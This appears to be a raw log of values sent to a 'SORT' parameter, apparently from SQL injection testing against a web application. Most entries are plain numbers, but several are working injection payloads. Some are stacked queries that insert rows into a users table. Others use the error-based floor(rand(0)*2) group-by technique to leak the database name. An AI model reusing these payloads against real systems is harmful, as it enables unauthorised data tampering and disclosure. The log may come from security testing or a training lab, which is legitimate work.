SORT:1
SORT:1';
SORT:1'
SORT:1
SORT:2
SORT:3
SORT:4
SORT:2
SORT:1
SORT:1
SORT:1
SORT:2
SORT:3
SORT:3' ; insert into users values(14,'a','a') -- 
SORT:3
SORT:3' ; insert into users values(14,'a','a') -- 
SORT:3' ; insert into users values(15, 'a', 'a') -- 
SORT:3
SORT:1
SORT:0
SORT:'; (select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2))x from (select 1 union select 2 union select 3)t group by x having min(0))-- -
SORT:'; (select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2))x from (select 1 union select 2 union select 3)t group by x having min(0))-- -
SORT:'; (select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2))x from (select 1 union select 2 union select 3)t group by x having min(0))-- -
